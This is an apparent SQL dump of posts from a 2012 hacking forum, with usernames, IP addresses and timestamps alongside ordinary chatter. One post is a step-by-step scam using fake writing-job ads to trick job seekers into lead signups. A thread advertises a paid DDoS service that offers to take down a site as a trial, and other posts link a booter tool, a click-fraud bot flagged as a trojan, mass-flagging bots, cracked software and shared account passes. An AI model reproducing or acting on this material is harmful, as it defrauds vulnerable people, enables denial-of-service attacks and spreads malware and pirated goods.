don\'t much activity .', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '784a8e5d528e0215b46f65f66a7531a1', '0', '0'); INSERT INTO mybb_posts VALUES('1839', '254', '1107', '49', 'RE: Gamers Section', '0', '1', 't3h jok3r', '1347465982', 'They will be added soon, can\'t say soon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '19251ba707b85d3455c2fe483528f617', '0', '0'); INSERT INTO mybb_posts VALUES('1840', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347466071', 'I tried sending it to my phone but it didn\'t work.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'afda5b1d7ff7b2b79b355b8037c5fc96', '0', '0'); INSERT INTO mybb_posts VALUES('1841', '368', '1807', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '1', 't3h jok3r', '1347466214', '[quote=\'iTzIpod\' pid=\'1807\' dateline=\'1347392358\']\r\nWait does it have to be in the time duration of the contest. Or can it be threads from before?\r\n[/quote]\r\n\r\nThe threads have to be made after you check in.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b5c667306eee57aaf2a402104bc3072', '0', '0'); INSERT INTO mybb_posts VALUES('1842', '378', '1836', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347477833', '[quote=\'sirchamp\' pid=\'1836\' dateline=\'1347464106\']\r\nFunnily I also should be in Grade 8 but I skipped 2 classes So I go to secondary school.\r\n[/quote]\r\n\r\nNot sure if trolling or not..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '90ba364278c317b2a580b33fa0156cfe', '0', '0'); INSERT INTO mybb_posts VALUES('1843', '268', '1838', '49', 'RE: [Suggestion] Forum News Section', '0', '82', 'iTzIpod', '1347477957', 'Alright.\r\n\r\nSo I will close this for now. \r\n\r\nWill open a new thread once we meet the requirements?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '00dcc555eab1d7f5f8112ce1d4a411b9', '0', '0'); INSERT INTO mybb_posts VALUES('1844', '394', '0', '3', '[Bug] Username linking to profile', '0', '82', 'iTzIpod', '1347478573', 'I\'m pretty sure when you click on your Username, it links you to your profile. :o\r\nHow come it isn\'t doing that anymore?\r\n\r\nIf you don\'t know what I\'m talking about, it\'s this.\r\n[img]http://i.imgur.com/INAzP.png[/img]\r\n\r\nIf I click on iTzIpod, it should lead me to my profile. Or, I swear it did that before...\r\n\r\nDid it? :/ I don\'t know..', '24.212.197.164', '416597412', '1', '0', '82', '1347481687', '1', '83d67b78d8ec81e96505a405ac0c4204', '0', '1347481687'); INSERT INTO mybb_posts VALUES('1845', '394', '1844', '3', 'RE: [Bug] (I think) Name linking to profile', '0', '61', 'NXK', '1347478845', 'I have this problem aswell, And Yes it did.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '16f6f834c8541e9772eec55704729e80', '0', '0'); INSERT INTO mybb_posts VALUES('1846', '200', '723', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1347481426', 'Nevermind I got one.\n\nIt\'s cracked. \nI just had to switch the atmdbl.dll or whatever it\'s called with a cracked version. \n\n\nRequest /Close thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f238728ebd134aefda574e9bd1994c6a', '0', '0'); INSERT INTO mybb_posts VALUES('1847', '369', '1720', '55', 'RE: Paypal 1 dollar 50cents', '0', '82', 'iTzIpod', '1347481482', 'Do you still need it because I have the money.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1655a3394414c441ba53775edc4fd6e5', '0', '0'); INSERT INTO mybb_posts VALUES('1848', '212', '1827', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1347481771', '[quote=\'iTzIpod\' pid=\'1827\' dateline=\'1347414202\']\r\nNote: The Coders image is broken also, you forgot to edit my group \"Unique\" in. =]\r\n[/quote]\r\nThanks for reporting, it was because of the new domain. Lol I don\'t know how I missed that out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f5aa64706689843875a5c1297eaf155e', '0', '0'); INSERT INTO mybb_posts VALUES('1849', '18', '49', '2', 'RE: star test', '0', '1', 't3h jok3r', '1347482688', '[mod]Hi[/mod]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a27a1a17182a5d448b1a002823048abe', '0', '0'); INSERT INTO mybb_posts VALUES('1850', '395', '0', '9', 'Make 150+ a Day - Easy Blackhat Method!', '0', '1', 't3h jok3r', '1347484179', 'This method is blackhat… VERY blackhat. So\r\nblackhat in fact that I felt bad about doing it –\r\nhowever, you definitely can make money with it, as\r\nI’m proof that it works. I made $647/three days with\r\nthis before I stopped –twenty minutes of work to set\r\nthis up, and I’m not joking. After the setup, it took\r\nfive seconds daily… to check how much I had\r\nearned.\r\nI am going to show you an exact method I used –\r\nyou can expand this for any offer.\r\nA) Pick a good offer that pays well per signup. In my\r\ncase, I used Auto Insurance offer which pays\r\n$4/lead. (The offer is still online on cpalead.com)\r\nB) Setup a Gmail Account. It is better that you use\r\none that looks realistic, fake of course –\r\nsomething like FirstName.LastName98@gmail.com\r\nC) Purchase a domain. For example, if you choose\r\nto promote the auto insurance offer, you might\r\npurchase autoinsuranceonline.com or\r\ninsuranceauctions.com. Create an email address\r\nfor it - jobs@yourrelateddomain.com and add it to\r\nyour Gmail account (Setting _ Accounts). Set this\r\nnew email as your main email in Gmail. Redirect the\r\ndomain to your offer affiliate link.\r\nD) Go to job sites, for example see below.Post\r\nsomething like:\r\n\r\n\r\nHello,\r\nWe are looking for writers for our Auto insurance\r\nwebsite. You will need to create short (20 –25 word)\r\nwrite ups and Small product reviews. We will pay\r\n$0.01/word to start up, then increase if it goes well.\r\nYou MUST be interested in insurance to take up the\r\njob.\r\nDue to payment issues, we can only take writers\r\nthat are based in the USA for now. Please send an\r\nemail to YourNewGmailAcc@Gmail.com to apply if\r\nyou fit the criteria.\r\nThank You,\r\nYour (Fake) Name\r\n\r\n\r\n\r\n\r\n--------------------------------\r\nList of job websites:\r\nONLINE WRITING JOBS - Freelance Writing Jobs\r\nFreelancer.com - Hire Freelancers & Find Freelance Jobs Online\r\nhttp://www.elance.com\r\nRent a Coder: We\'ve changed our name to vWorker!\r\nI recommend the first one as it doesn’t require\r\nanything to post, just a free account. Posts will go\r\npending first, and then live after 1-2 days.\r\nE) Go to the Gmail account you setup. Under\r\nsettings, there will be a thing called Vacation\r\nauto responder. Write something like:\r\n\r\n\r\nHello,\r\nThank you for your interest. At the moment, we\r\nhave received lots of interested parties, so are\r\ngoing through the applications. Please signup at\r\nour website below and take a look around, as that\r\nwill make things quicker should we hire you.\r\nOnline Auto Insurance - Quotes Comparison, Find Cheap Rates, Buy Car Insurance Policy Online (for example – I\r\nbelieve this domain is still available).\r\nThank you,\r\nYour (Fake) Name\r\n\r\n\r\n\r\n\r\nNearly every single person you reply to will signup.\r\nYou will get a crazy amount of emails. I got more\r\nthan 700 emails and almost all of those emails came\r\nwithin 5 days. USA, job hungryI only replied to\r\naround 100, and had almost all of them signup,\r\nnetting me $640 in revenue after three days and a\r\nshort while of work to setup the above steps.\r\nIf you use Online Writing Jobs, your only spend is\r\nthe domain.\r\nI strongly suggest you find a different offer, or not\r\nuse Auto insurance on Online Writing Jobs as I\r\nhave already done so. I did not promote at any\r\nother job website though, so there is a lot open for\r\nyou to target.\r\nRewrite the email and your job ads (but make them\r\nsimilar to the ones above) to gain maximum\r\nsuccess.\r\nYou can try this with any kind of pay per signup\r\noffer –USA ones tend to pay well. The good thing is\r\nthat you are sending targeted visitors (only people\r\nthat like insurance, for example) to the signup so\r\nthere is a high chance a few of them will stay on\r\ngiving you a good conversion rate.\r\nEnjoy,', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '88ef59b7d43f72dcd99b27ad9e2475c3', '0', '0'); INSERT INTO mybb_posts VALUES('1851', '394', '1844', '3', 'RE: [Bug] Username linking to profile', '0', '1', 't3h jok3r', '1347491015', 'It did, I did a new update and it\'s not able to redirect anymore. I\'m working on it now, I\'m leaving this open till it\'s solved.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9edd6d1431fa5a6fb16ed226e7b9add2', '0', '0'); INSERT INTO mybb_posts VALUES('1852', '385', '1768', '19', 'RE: Discussion', '0', '1', 't3h jok3r', '1347491120', 'You\'re a good member, there are always haters in life and if you are afraid of them then you can\'t succeed. At the moment, I\'m the target so don\'t worry.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c6d313bd3f812b91c0dec0e0a66a8542', '0', '0'); INSERT INTO mybb_posts VALUES('1853', '318', '1779', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '82', 'iTzIpod', '1347493581', 'OT: I can\'t use this method to make money..\nAgreed with duhuh since it\'s a 50% chance to land Heads/Tails.\n\nAlso, it\'s not really by doing nothing.', '24.212.197.164', '416597412', '1', '0', '61', '1347499042', '1', '072ed8f05dc70b35f7bb49fb339edda8', '0', '1347499042'); INSERT INTO mybb_posts VALUES('1861', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1347499317', 'I don\'t think that this is the appropriate section to place this thread. Although that is just my opinion.\n\nI\'m going to have to let t3h jok3r or NXK decide about this.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '600ae21255807eb104b9aa8b29a87583', '0', '0'); INSERT INTO mybb_posts VALUES('1854', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '82', 'iTzIpod', '1347493698', 'I use this VPN from time to time. It\'s really good too. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '987b1dae564e98483e4b8e3defd301a8', '0', '0'); INSERT INTO mybb_posts VALUES('1855', '95', '225', '13', 'RE: XSS Cheat Sheet', '0', '82', 'iTzIpod', '1347493741', 'Thanks for contributing to L33t Hacking. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '01a1f6bc5b990e4d8248e1ae84e5fe6e', '0', '0'); INSERT INTO mybb_posts VALUES('1856', '38', '98', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347493805', 'Cool tutorial :3\n\nI\'m not a good liar.. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '978d89be65418c4b2807e263a03e07a9', '0', '0'); INSERT INTO mybb_posts VALUES('1857', '391', '1820', '3', 'RE: Demoted', '0', '20', 'JakeUS', '1347493854', '[quote=\'NXK\' pid=\'1820\' dateline=\'1347413370\']\r\nI\'m glad that I have taken over your position. I think Ill do a good job. But At the same time I feel kinda bad :(\r\n\r\nI hope I can do my job as well as you did. Thanks for the chance.\r\n[/quote]\r\n\r\nDon\'t feel bad, you\'ll do an amazing job!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '855eee6ba3103f9936d33b4d98a593c4', '0', '0'); INSERT INTO mybb_posts VALUES('1862', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '1', 't3h jok3r', '1347505894', 'We don\'t have a marketplace so the botnets is the right section. Also I would like a vouch copy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2306757b41f9598ff4e9006df9adb870', '0', '0'); INSERT INTO mybb_posts VALUES('1863', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347517279', 'What did you use from the combobox?', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '931f93b5a8882004f7ca8877b651f68a', '0', '0'); INSERT INTO mybb_posts VALUES('1864', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '62', 'R?????zo?', '1347524860', 'Thanks for accepting me :)\nI will gladly contribute with my unique skills, specially GFX :)', '95.69.28.98', '1598364770', '1', '0', '0', '0', '1', 'e0e5d5eb18cfddc6b529c22c2a6180eb', '0', '0'); INSERT INTO mybb_posts VALUES('1859', '397', '0', '42', '11th Anniversary of 9/11', '0', '82', 'iTzIpod', '1347494305', 'Late thread.\r\nI know today is 9/12/12 but it\'s still a day that changed everyone\'s lives.\r\n\r\nR.I.P. Everyone that died on that day. <3\r\n\r\nhttp://en.wikipedia.org/wiki/September_11_attacks', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '29cea004d4200f7e0957b26f54b9644d', '0', '0'); INSERT INTO mybb_posts VALUES('1860', '398', '0', '21', '[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '100', '??zg???g????61', '1347497923', '[align=center][img]http://i.imgur.com/Re0aB.jpg?1[/img][/align]', '65.96.215.138', '1096865674', '1', '0', '100', '1350952769', '1', '46e4d46ba3f6acbbf7b05319c911346c', '0', '1350952769'); INSERT INTO mybb_posts VALUES('6180', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '257', 'XxTREYZxX', '1350971078', 'how do we find out about who\'s the leader of the group :)', '122.108.206.162', '2053951138', '1', '0', '0', '0', '1', 'd1de17609e50244b74f5da27980e7129', '0', '0'); INSERT INTO mybb_posts VALUES('6181', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1350975452', 'Hopefully NXK chooses one soon :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '407cc5762b6e65db73208c2625548029', '0', '0'); INSERT INTO mybb_posts VALUES('6182', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '62', 'R?????zo?', '1350975514', 'You check the threads of recruitment', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd07d48bd54b7efe55cbc65af23898bc8', '0', '0'); INSERT INTO mybb_posts VALUES('6183', '765', '3901', '46', 'RE: Vulcan Private Pisher Generator', '0', '100', '??zg???g????61', '1350991460', 'Cool thanks :) I\'ll try this today.', '70.192.1.88', '1186988376', '1', '0', '0', '0', '1', '6e67bc490a2705cd54723b93fcd8a735', '0', '0'); INSERT INTO mybb_posts VALUES('6184', '1068', '0', '54', 'giganews (usenet)[vpn] acount for lifetime', '15', '255', 'sbhshroy2', '1350992146', 'click here http://adfoc.us/7433111268358', '49.15.116.218', '823096538', '0', '0', '0', '0', '1', '09435f761aace243a2efccebb1d34554', '0', '0'); INSERT INTO mybb_posts VALUES('6185', '1069', '0', '54', '[23 October] Premium Elite XXX Passes, All Checked And Working', '15', '255', 'sbhshroy2', '1350992268', 'click here http://adfoc.us/7433111259603', '49.15.116.218', '823096538', '0', '0', '0', '0', '1', '677d4662f98ddfa32dc479b53b148c5b', '0', '0'); INSERT INTO mybb_posts VALUES('6186', '874', '4963', '7', 'RE: N.A.S.A HACKED', '0', '259', 'MeowMeow', '1350992367', '[quote=\'??????????¢™\' pid=\'4963\' dateline=\'1350433537\']\r\n[quote=\'MeowMeow\' pid=\'4954\' dateline=\'1350432908\']\r\nYou guys are thinking that NASA is some OMG site. Not really it\'s really not that good in any security at all. No new thing.\r\n[/quote]\r\n\r\nLMAO no we arent, Its because it is a government site we arent thinking its a OMG site.\r\n[/quote]\r\n\r\nLol, isn\'t that what I said exactly?', '121.222.91.48', '2044615472', '0', '0', '0', '0', '1', 'dbcab4528d23b79b684c555758b49c91', '0', '0'); INSERT INTO mybb_posts VALUES('6187', '1069', '6185', '54', 'RE: [23 October] Premium Elite XXX Passes, All Checked And Working', '0', '62', 'R?????zo?', '1350992957', 'thanks for sharing bro, apreciated :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '14c31dc3c30142f7dfa7bd24492d5372', '0', '0'); INSERT INTO mybb_posts VALUES('6188', '1068', '6184', '54', 'RE: giganews (usenet)[vpn] acount for lifetime', '0', '62', 'R?????zo?', '1350993126', 'thanks for sharing bro, apreciated :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5da8e1f220ac209c4f275a9ae3af6822', '0', '0'); INSERT INTO mybb_posts VALUES('6189', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '205', 'mothered', '1350993858', 'Nice tutorial mate.\r\n\r\nI\'ve bookmarked It, and will read It In detail when time permits.\r\nThanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ec2536bb4047bfa17b2944b14459c7b2', '0', '0'); INSERT INTO mybb_posts VALUES('1865', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1347533759', 'Yeah thats why I posted here. joker, PM me with the website. I\'ll get back to you tonight and take it down for you so you can see. Thanks!', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'ae805c3ac63d9ac53fa48dce3b09e4a4', '0', '0'); INSERT INTO mybb_posts VALUES('1866', '378', '1742', '7', 'RE: How is school for you?', '0', '53', 'sirchamp', '1347536097', 'Not sure if you are beeing an idiot on purpose', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '40221d576e4ca95e5158ac346c41c3e2', '0', '0'); INSERT INTO mybb_posts VALUES('1867', '315', '1864', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1347536967', '[quote=\'R?????zo?\' pid=\'1864\' dateline=\'1347524860\']\r\nThanks for accepting me :)\r\nI will gladly contribute with my unique skills, specially GFX :)\r\n[/quote]\r\n\r\nI love your GFX! ;) You have talent.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '037659d777ca954ae5443dfc65f31c01', '0', '0'); INSERT INTO mybb_posts VALUES('1868', '378', '1866', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347537154', '[quote=\'sirchamp\' pid=\'1866\' dateline=\'1347536097\']\r\nNot sure if you are beeing an idiot on purpose\r\n[/quote]\r\n\r\nWell you spelt \"beeing\" instead of being so... :whistle:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '41f77e6aa7e13ed4064db7041d100cec', '0', '0'); INSERT INTO mybb_posts VALUES('1869', '399', '0', '3', '[Bug] Error', '0', '82', 'iTzIpod', '1347537342', '[img]http://prntscr.com/fgpaf[/img]\n\nIt\'s when I click on the [mod]Removed for security reasons[/mod] section.\nNot sure if it\'s just me. But I get this error.\n\nEDIT: I guess there is something messed up with the image... \n\nRight Click>Open Image in New Tab', '24.212.197.164', '416597412', '1', '0', '1', '1347593544', '1', '11e35bfed550a1aa28ed27bad48799f0', '0', '1347593544'); INSERT INTO mybb_posts VALUES('1870', '370', '1761', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '172', 'MistaCode', '1347538307', '[quote=\'t3h jok3r\' pid=\'1761\' dateline=\'1347248932\']\r\nJust saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too.\r\n[/quote]\r\n\r\nkk ill make an better one :D\r\n\r\nbut the font was something called Hacker argot or something.. but yeah ill make soon an new one ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '37168e8553da63813c8072c7c801a0ff', '0', '0'); INSERT INTO mybb_posts VALUES('1871', '378', '1742', '7', 'RE: How is school for you?', '0', '53', 'sirchamp', '1347543176', 'Care? I\'m not a native speaker so shut up. You are one unless you live in quebec but I doubt that. And I bet I can speak better french than you even though the official languages of Canada are english and french!', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'e21f7bac87889c7bd9e24aa216fd6fe2', '0', '0'); INSERT INTO mybb_posts VALUES('1872', '18', '49', '2', 'RE: star test', '0', '61', 'NXK', '1347545481', 'That star is hot man.\r\n\r\nMaybe staff upgrade to black stars :)?', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '762fd0d2f8ea83e80bf17388fb1037fd', '0', '0'); INSERT INTO mybb_posts VALUES('1873', '378', '1871', '7', 'RE: How is school for you?', '0', '61', 'NXK', '1347545726', '[quote=\'sirchamp\' pid=\'1871\' dateline=\'1347543176\']\r\nCare? I\'m not a native speaker so shut up. You are one unless you live in quebec but I doubt that. And I bet I can speak better french than you even though the official languages of Canada are english and french!\r\n[/quote]\r\n\r\nPlease learn to respect other members.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'e9d98edb2bcad2ce4503419be3850e8a', '0', '0'); INSERT INTO mybb_posts VALUES('1874', '370', '1761', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '62', 'R?????zo?', '1347548689', '[quote=\'t3h jok3r\' pid=\'1761\' dateline=\'1347248932\']\r\nJust saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too.\r\n[/quote]\r\n\r\nif you looking for a logo I can try and make something fancy?', '31.22.165.195', '521577923', '1', '0', '0', '0', '1', '43c8319d0af8708ddfe31ed79c59ea71', '0', '0'); INSERT INTO mybb_posts VALUES('1875', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '67', 'HoverCatz', '1347550123', 'I would like a vouch copy.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'bd84005b3428e436bec5604e4ce919d5', '0', '0'); INSERT INTO mybb_posts VALUES('1876', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '62', 'R?????zo?', '1347550339', 'I tried, not sure if you like it though.\n\n[img]http://i.imgur.com/iD3g6.png[/img]\n\n[img]http://i.imgur.com/QXFt5.png[/img]', '31.22.165.195', '521577923', '1', '0', '62', '1347550525', '1', 'f89844189ae2a8c0aa3e8bc037f896b5', '0', '1347550525'); INSERT INTO mybb_posts VALUES('1877', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1347556535', 'Alright, thats it for vouch copies though (; PM me with the website info and I\'ll tell you when I take it down.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '350427994f727e902014451f43269247', '0', '0'); INSERT INTO mybb_posts VALUES('1878', '399', '1869', '3', 'RE: [Bug] Error', '0', '20', 'JakeUS', '1347564109', 'PM Joker with the issue, unless he sees this thread.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '44d3df6a9d2a728110dbfa3dc29cde68', '0', '0'); INSERT INTO mybb_posts VALUES('1879', '378', '1873', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347564263', '[quote=\'NXK\' pid=\'1873\' dateline=\'1347545726\']\r\n[quote=\'sirchamp\' pid=\'1871\' dateline=\'1347543176\']\r\nCare? I\'m not a native speaker so shut up. You are one unless you live in quebec but I doubt that. And I bet I can speak better french than you even though the official languages of Canada are english and french!\r\n[/quote]\r\n\r\nPlease learn to respect other members.\r\n[/quote]\r\nEspecially Mods and Staff...\r\n\r\nThanks for saying that.\r\n\r\n@sirchamp, I don\'t live in Quebec. Do you win a cookie or something if you speak French/English better than me?\r\nI don\'t think that matters at the moment right now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cb922685b9d24c27944e600430efddf0', '0', '0'); INSERT INTO mybb_posts VALUES('1880', '400', '0', '59', 'Free Pizza method', '0', '61', 'NXK', '1347568353', 'I Just got a ebook on how to get free pizza. The user was charging 3$ per copy and this ebook is complete garbage. It\'s not even a full paragraph.\r\n\r\nhere it is.\r\nhttp://www.mediafire.com/?8wzfg850302yrd8\r\n\r\nNot even worth 50 cents.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0554886cf47e752ab7191647e9e88da2', '0', '0'); INSERT INTO mybb_posts VALUES('1881', '401', '0', '12', 'How to get a free skype resolver with working numbers !', '0', '82', 'iTzIpod', '1347570604', '[code]\r\n1# Go to this site: http://froststresser.com/booter/login.php\r\n2# Make an account\r\n3# Click Skype Resolver\r\n4# You are done!\r\n[/code]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d18ba710f7c9ba5a4974c3ea95c6f6d', '0', '0'); INSERT INTO mybb_posts VALUES('1935', '385', '1852', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347633946', '[quote=\'t3h jok3r\' pid=\'1852\' dateline=\'1347491120\']\r\n[b]You\'re a good member[/b], [u]there are always haters in life and if you are afraid of them then you can\'t succeed. At the moment, I\'m the target so don\'t worry.[/u]\r\n[/quote]\r\n\r\n@Bolded Text, Thanks.\r\n@Underlined Text, I don\'t get what you mean.?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7dd7503d1b29917f70313ccb2243cef0', '0', '0'); INSERT INTO mybb_posts VALUES('1936', '422', '0', '19', '[Junk][Read] Announcement', '0', '82', 'iTzIpod', '1347634256', 'Hey everyone,\nI might be starting giveaways and stuff now.\nOnly to be released in this group.\nIf you release anything outside of Unique, I will remove you.\nPlease don\'t make me do that because you guys are all HQ. =]\n\nI will be starting to do giveaways and all soon.\n\nPlease don\'t share anything outside the group. :/', '24.212.197.164', '416597412', '1', '0', '82', '1347711552', '1', '96b0f81fb6472946e1d3857dd9cf9594', '0', '1347711552'); INSERT INTO mybb_posts VALUES('1883', '403', '0', '18', 'Youtube Bot', '0', '82', 'iTzIpod', '1347571098', '[align=center]- I take no credit for creating the bot at all\r\n[spoiler= Features]\r\n* Mass Commenter\r\n* Account Checker\r\n* Password Changer\r\n* Video Collector\r\n* Comment Collector\r\n* Mass Like/Dislike\r\n* Mass Subscribe\r\n* Mass Flag\r\n[/spoiler]\r\n[spoiler=Download]\r\nhttp://www.mediafire.com/?8t8dtobk4u7jq7d\r\n[/spoiler]\r\n[spoiler=VirusScan]\r\nAntivirus Result Update\r\nAhnLab-V3 - 20120903\r\nAntiVir - 20120904\r\nAntiy-AVL - 20120904\r\nAvast - 20120904\r\nAVG - 20120904\r\nBitDefender - 20120904\r\nByteHero - 20120830\r\nCAT-QuickHeal - 20120904\r\nClamAV - 20120904\r\nCommtouch - 20120904\r\nComodo - 20120904\r\nDrWeb - 20120904\r\nEmsisoft - 20120904\r\neSafe - 20120902\r\nESET-NOD32 - 20120904\r\nF-Prot - 20120903\r\nF-Secure - 20120904\r\nFortinet - 20120830\r\nGData - 20120904\r\nIkarus - 20120904\r\nJiangmin - 20120904\r\nK7AntiVirus - 20120903\r\nKaspersky - 20120904\r\nMcAfee - 20120904\r\nMcAfee-GW-Edition - 20120904\r\nMicrosoft - 20120904\r\nNorman - None\r\nnProtect - 20120904\r\nPanda - 20120903\r\nPCTools - 20120904\r\nRising - 20120904\r\nSophos - 20120904\r\nSUPERAntiSpyware - 20120903\r\nSymantec - 20120904\r\nTheHacker - 20120903\r\nTotalDefense - 20120903\r\nTrendMicro - 20120904\r\nTrendMicro-HouseCall - 20120904\r\nVBA32 - 20120904\r\nVIPRE - 20120904\r\nViRobot - 20120904\r\nVirusBuster - 20120904\r\n[/spoiler][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1347571172', '1', '84b8f404819f37959f4fdac049b1c4c3', '0', '1347571172'); INSERT INTO mybb_posts VALUES('1884', '404', '0', '30', 'Sony Vegas Pro 11.0 & After Effects', '0', '82', 'iTzIpod', '1347571259', 'You don\'t need a torrent for this. Only Winrar.\r\n\r\nWinrar- http://www.win-rar.com/download.html?&L=0\r\n\r\nAdobe AE CS5.5- http://www.gamefront.com/files/21225215/ADinosaurBona+Adobe+After+Effects+CS5.5.rar\r\n\r\nSony Vegas Pro 11- http://www.gamefront.com/files/21473431/Sony+vegas+pro+11+By+ADinosaurBona.zip', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'beeaecde37cecaf8a82198fd180832d5', '0', '0'); INSERT INTO mybb_posts VALUES('1885', '405', '0', '29', 'Adf.ly Mass Clicking Bot', '0', '82', 'iTzIpod', '1347571418', '[u][b]--Instructions--[/b][/u]\n[b]1.[/b] Run iView Fur U v3.exe\n[b]2.[/b] Load a list of mostly USA proxies in the form IP:Port or import from a .txt\n[b]3.[/b] Input your adf.ly link. (Remember to add the http://www part!)\n[b]3.[/b] Set the delay to 9 to 16 seconds to avoid ban.\n[b]4.[/b] Start the program.\n\nYou should run this in a sandbox until it is confirmed safe.\n\n[u][b]Download:[/b][/u]\nhttp://www.mediafire.com/?z25zz2iitnm\n\nDon\'t have an adf.ly account?\n[url=http://adf.ly/][b]Sign up for Adf.ly[/b][/url]\n\n[img]http://i939.photobucket.com/albums/ad239/111fatty111/iview.png[/img]\n\n[i]File Info[/i]\n\nReport date: 2012-09-09 22:01:43 (GMT 1)\nFile name: [b]iview-fur-u-v3-exe[/b]\nFile size: 491363 bytes\nMD5 Hash: b95bf6e70584d7b79d7089cd24f3128d\nSHA1 Hash: 28db17b77225d346906c7f0820ef9168b5a487d1\nDetection rate: [color=red]3[/color] on 14 ([color=red]21%[/color]) \nStatus: [color=red]INFECTED[/color] \n\n[i]Detections[/i]\nAvira - [color=red]TR/Agent.wyy.4[/color]\nSTOPZilla - [color=red]Trojan.Win32.Mal.Gen.35874[/color]\nTrendMicro - [color=red]TROJ_SPNR.03FK12[/color]', '24.212.197.164', '416597412', '1', '0', '82', '1347571461', '1', 'b9827d5d4de8ece721be19ab24dee349', '0', '1347571461'); INSERT INTO mybb_posts VALUES('1886', '406', '0', '30', 'Skype Fake Quote Generator', '0', '82', 'iTzIpod', '1347571538', '[img]http://i798.photobucket.com/albums/yy262/XykHF/skype-fake.png[/img]\r\n\r\nhttp://www.mediafire.com/?y4kqde6ddbhcqch\r\n\r\n\r\nVirus Scan: \r\nhttps://www.virustotal.com/file/b727771bcb35da01f739a26a3b60f2a31bcc29954b9848ffff3ec4deb222133a/analysis/1347381477/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f4c201f99abbfdaf11f68a81142685af', '0', '0'); INSERT INTO mybb_posts VALUES('1887', '407', '0', '29', 'Instagram Bot [Mass Like]', '0', '82', 'iTzIpod', '1347571650', 'Here is the Virus Scan: https://www.virustotal.com/file/ba191eae9fa0248d89c5fef3857a42f4a2864af7b1d502232d2ca490a57b98c1/analysis/\r\n\r\nPicture 